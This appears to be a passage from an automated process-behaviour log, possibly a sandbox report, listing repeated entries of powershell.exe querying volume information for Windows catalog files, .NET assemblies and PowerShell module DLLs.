        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
